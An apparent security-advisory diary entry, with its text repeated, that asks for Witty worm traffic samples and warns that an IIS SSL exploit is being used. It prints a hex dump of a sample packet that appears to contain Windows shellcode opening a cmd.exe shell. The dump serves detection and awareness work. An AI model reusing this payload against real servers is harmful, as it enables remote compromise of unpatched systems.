Witty Traffic Request / Mailbag
Witty Traffic Request
Witty came out 4 weeks ago. We do hear rumors of variants, but have no confirmation so far and would like to request traffic samples of unusual traffic with source port 4000.
Mailbag
Some users are already reporting the use of the IIS SSL exploit for remote compromise. However there is not sign of a worm yet. The reports are currently based on one known tool and this tool currently only targets English and German versions.
New tools are being released to explore the TCP and MS SSL vulnerabilities. Now that some virus are 'open source'(i.e. Phatbot), may be question of time to see it incorporated into them.
So, once again, patch your systems!
Reference: http://www.f-secure.com/weblog/
Sample Packet:
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......
4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32
2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 ED 2A .DLL........]..*
6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B 78 08 j0Yd...@..p...x.
8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B 1C 01 ._<.....[x...K..
F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB 31 C9 ..S$..SQR.[ ..1.
41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 84 C0 A1...4....1.....
75 F7 0F B6 45 05 8D 44 45 04 66 39 10 75 E1 66 u...E..DE.f9.u.f
31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 0C 4A 1.ZX^VPR+N.A...J
8B 04 88 01 F8 0F B6 4D 05 89 44 8D D8 FE 4D 05 .......M..D...M.
75 BE FE 4D 04 74 21 FE 4D 22 8D 5D 18 53 FF D0 u..M.t!.M".].S..
89 C7 6A 04 58 88 45 05 80 45 77 0A 8D 5D 74 80 ..j.X.E..Ew..]t.
6B 26 14 E9 78 FF FF FF 89 CE 31 DB 53 53 53 53 k&..x.....1.SSSS
56 46 56 FF D0 97 55 58 66 89 30 6A 10 55 57 FF VFV...UXf.0j.UW.
55 D4 4E 56 57 FF 55 CC 53 55 57 FF 55 D0 97 8D U.NVW.U.SUW.U...
45 88 50 FF 55 E4 55 55 FF 55 E8 8D 44 05 0C 94 E.P.U.UU.U..D...
53 68 2E 65 78 65 68 5C 63 6D 64 94 31 D2 8D 45 Sh.exeh\cmd.1..E
CC 94 57 57 57 53 53 FE C6 01 F2 52 94 8D 45 78 ..WWWSS....R..Ex
50 8D 45 88 50 B1 08 53 53 6A 10 FE CE 52 53 53 P.E.P..SSj...RSS
53 55 FF 55 EC 6A FF FF 55 E0 SU.U.j..U.
---------------------------------------------------------------
Handler on duty: Pedro Bueno (bueno_AT_ieee.org)
Witty came out 4 weeks ago. We do hear rumors of variants, but have no confirmation so far and would like to request traffic samples of unusual traffic with source port 4000.
Mailbag
Some users are already reporting the use of the IIS SSL exploit for remote compromise. However there is not sign of a worm yet. The reports are currently based on one known tool and this tool currently only targets English and German versions.
New tools are being released to explore the TCP and MS SSL vulnerabilities. Now that some virus are 'open source'(i.e. Phatbot), may be question of time to see it incorporated into them.
So, once again, patch your systems!
Reference: http://www.f-secure.com/weblog/
Sample Packet:
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......
4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32
2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 ED 2A .DLL........]..*
6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B 78 08 j0Yd...@..p...x.
8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B 1C 01 ._<.....[x...K..
F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB 31 C9 ..S$..SQR.[ ..1.
41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 84 C0 A1...4....1.....
75 F7 0F B6 45 05 8D 44 45 04 66 39 10 75 E1 66 u...E..DE.f9.u.f
31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 0C 4A 1.ZX^VPR+N.A...J
8B 04 88 01 F8 0F B6 4D 05 89 44 8D D8 FE 4D 05 .......M..D...M.
75 BE FE 4D 04 74 21 FE 4D 22 8D 5D 18 53 FF D0 u..M.t!.M".].S..
89 C7 6A 04 58 88 45 05 80 45 77 0A 8D 5D 74 80 ..j.X.E..Ew..]t.
6B 26 14 E9 78 FF FF FF 89 CE 31 DB 53 53 53 53 k&..x.....1.SSSS
56 46 56 FF D0 97 55 58 66 89 30 6A 10 55 57 FF VFV...UXf.0j.UW.
55 D4 4E 56 57 FF 55 CC 53 55 57 FF 55 D0 97 8D U.NVW.U.SUW.U...
45 88 50 FF 55 E4 55 55 FF 55 E8 8D 44 05 0C 94 E.P.U.UU.U..D...
53 68 2E 65 78 65 68 5C 63 6D 64 94 31 D2 8D 45 Sh.exeh\cmd.1..E
CC 94 57 57 57 53 53 FE C6 01 F2 52 94 8D 45 78 ..WWWSS....R..Ex
50 8D 45 88 50 B1 08 53 53 6A 10 FE CE 52 53 53 P.E.P..SSj...RSS
53 55 FF 55 EC 6A FF FF 55 E0 SU.U.j..U.
---------------------------------------------------------------
Handler on duty: Pedro Bueno (bueno_AT_ieee.org)
Keywords:
0 comment(s)
×
Diary Archives
Comments